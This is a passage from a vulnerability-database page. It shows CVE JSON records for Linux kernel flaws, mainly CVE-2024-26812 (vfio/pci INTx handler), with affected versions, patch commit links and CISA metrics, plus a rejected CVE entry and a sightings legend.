"url": "https://git.kernel.org/stable/c/d4663536754defff75ff1eca0aaebc41da165a8d"
},
{
"url": "https://git.kernel.org/stable/c/dd6e9894b451e7c85cceb8e9dc5432679a70e7dc"
}
],
"title": "kobject_uevent: Fix OOB access within zap_modalias_env()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42292",
"datePublished": "2024-08-17T09:09:01.586Z",
"dateReserved": "2024-07-30T07:40:12.268Z",
"dateUpdated": "2025-05-04T09:26:07.282Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42308 (GCVE-0-2024-42308)
Vulnerability from cvelistv5
This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.
Show details on NVD website{
"containers": {
"cna": {
"providerMetadata": {
"dateUpdated": "2024-10-09T13:57:37.908Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"rejectedReasons": [
{
"lang": "en",
"value": "This CVE ID has been rejected or withdrawn by its CVE Numbering Authority."
}
]
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42308",
"datePublished": "2024-08-17T09:09:13.467Z",
"dateRejected": "2024-10-09T13:57:37.908Z",
"dateReserved": "2024-07-30T07:40:12.275Z",
"dateUpdated": "2024-10-09T13:57:37.908Z",
"state": "REJECTED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26812 (GCVE-0-2024-26812)
Vulnerability from cvelistv5
Published
2024-04-05 08:24
Modified
2025-05-04 08:57
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
vfio/pci: Create persistent INTx handler
A vulnerability exists where the eventfd for INTx signaling can be
deconfigured, which unregisters the IRQ handler but still allows
eventfds to be signaled with a NULL context through the SET_IRQS ioctl
or through unmask irqfd if the device interrupt is pending.
Ideally this could be solved with some additional locking; the igate
mutex serializes the ioctl and config space accesses, and the interrupt
handler is unregistered relative to the trigger, but the irqfd path
runs asynchronous to those. The igate mutex cannot be acquired from the
atomic context of the eventfd wake function. Disabling the irqfd
relative to the eventfd registration is potentially incompatible with
existing userspace.
As a result, the solution implemented here moves configuration of the
INTx interrupt handler to track the lifetime of the INTx context object
and irq_type configuration, rather than registration of a particular
trigger eventfd. Synchronization is added between the ioctl path and
eventfd_signal() wrapper such that the eventfd trigger can be
dynamically updated relative to in-flight interrupts or irqfd callbacks.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 89e1f7d4c66d85f42c3d52ea3866eb10cadf6153 Version: 89e1f7d4c66d85f42c3d52ea3866eb10cadf6153 Version: 89e1f7d4c66d85f42c3d52ea3866eb10cadf6153 Version: 89e1f7d4c66d85f42c3d52ea3866eb10cadf6153 Version: 89e1f7d4c66d85f42c3d52ea3866eb10cadf6153 Version: 89e1f7d4c66d85f42c3d52ea3866eb10cadf6153 Version: 89e1f7d4c66d85f42c3d52ea3866eb10cadf6153 Version: 89e1f7d4c66d85f42c3d52ea3866eb10cadf6153 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26812",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-04-05T14:00:34.055358Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-05T17:20:45.884Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.527Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b18fa894d615c8527e15d96b76c7448800e13899"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/27d40bf72dd9a6600b76ad05859176ea9a1b4897"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4cb0d7532126d23145329826c38054b4e9a05e7c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7d29d4c72c1e196cce6969c98072a272d1a703b3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/69276a555c740acfbff13fb5769ee9c92e1c828e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4c089cefe30924fbe20dd1ee92774ea1f5eca834"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0e09cf81959d9f12b75ad5c6dd53d237432ed034"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/18c198c96a815c962adc2b9b77909eec0be7df4d"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/vfio/pci/vfio_pci_intrs.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "b18fa894d615c8527e15d96b76c7448800e13899",
"status": "affected",
"version": "89e1f7d4c66d85f42c3d52ea3866eb10cadf6153",
"versionType": "git"
},
{
"lessThan": "27d40bf72dd9a6600b76ad05859176ea9a1b4897",
"status": "affected",
"version": "89e1f7d4c66d85f42c3d52ea3866eb10cadf6153",
"versionType": "git"
},
{
"lessThan": "4cb0d7532126d23145329826c38054b4e9a05e7c",
"status": "affected",
"version": "89e1f7d4c66d85f42c3d52ea3866eb10cadf6153",
"versionType": "git"
},
{
"lessThan": "7d29d4c72c1e196cce6969c98072a272d1a703b3",
"status": "affected",
"version": "89e1f7d4c66d85f42c3d52ea3866eb10cadf6153",
"versionType": "git"
},
{
"lessThan": "69276a555c740acfbff13fb5769ee9c92e1c828e",
"status": "affected",
"version": "89e1f7d4c66d85f42c3d52ea3866eb10cadf6153",
"versionType": "git"
},
{
"lessThan": "4c089cefe30924fbe20dd1ee92774ea1f5eca834",
"status": "affected",
"version": "89e1f7d4c66d85f42c3d52ea3866eb10cadf6153",
"versionType": "git"
},
{
"lessThan": "0e09cf81959d9f12b75ad5c6dd53d237432ed034",
"status": "affected",
"version": "89e1f7d4c66d85f42c3d52ea3866eb10cadf6153",
"versionType": "git"
},
{
"lessThan": "18c198c96a815c962adc2b9b77909eec0be7df4d",
"status": "affected",
"version": "89e1f7d4c66d85f42c3d52ea3866eb10cadf6153",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/vfio/pci/vfio_pci_intrs.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.6"
},
{
"lessThan": "3.6",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.84",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.24",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"versionStartIncluding": "3.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "3.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "3.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.84",
"versionStartIncluding": "3.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.24",
"versionStartIncluding": "3.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.12",
"versionStartIncluding": "3.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.3",
"versionStartIncluding": "3.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "3.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nvfio/pci: Create persistent INTx handler\n\nA vulnerability exists where the eventfd for INTx signaling can be\ndeconfigured, which unregisters the IRQ handler but still allows\neventfds to be signaled with a NULL context through the SET_IRQS ioctl\nor through unmask irqfd if the device interrupt is pending.\n\nIdeally this could be solved with some additional locking; the igate\nmutex serializes the ioctl and config space accesses, and the interrupt\nhandler is unregistered relative to the trigger, but the irqfd path\nruns asynchronous to those. The igate mutex cannot be acquired from the\natomic context of the eventfd wake function. Disabling the irqfd\nrelative to the eventfd registration is potentially incompatible with\nexisting userspace.\n\nAs a result, the solution implemented here moves configuration of the\nINTx interrupt handler to track the lifetime of the INTx context object\nand irq_type configuration, rather than registration of a particular\ntrigger eventfd. Synchronization is added between the ioctl path and\neventfd_signal() wrapper such that the eventfd trigger can be\ndynamically updated relative to in-flight interrupts or irqfd callbacks."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:57:07.696Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/b18fa894d615c8527e15d96b76c7448800e13899"
},
{
"url": "https://git.kernel.org/stable/c/27d40bf72dd9a6600b76ad05859176ea9a1b4897"
},
{
"url": "https://git.kernel.org/stable/c/4cb0d7532126d23145329826c38054b4e9a05e7c"
},
{
"url": "https://git.kernel.org/stable/c/7d29d4c72c1e196cce6969c98072a272d1a703b3"
},
{
"url": "https://git.kernel.org/stable/c/69276a555c740acfbff13fb5769ee9c92e1c828e"
},
{
"url": "https://git.kernel.org/stable/c/4c089cefe30924fbe20dd1ee92774ea1f5eca834"
},
{
"url": "https://git.kernel.org/stable/c/0e09cf81959d9f12b75ad5c6dd53d237432ed034"
},
{
"url": "https://git.kernel.org/stable/c/18c198c96a815c962adc2b9b77909eec0be7df4d"
}
],
"title": "vfio/pci: Create persistent INTx handler",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26812",
"datePublished": "2024-04-05T08:24:42.627Z",
"dateReserved": "2024-02-19T14:20:24.180Z",
"dateUpdated": "2025-05-04T08:57:07.696Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.
Loading…
Loading…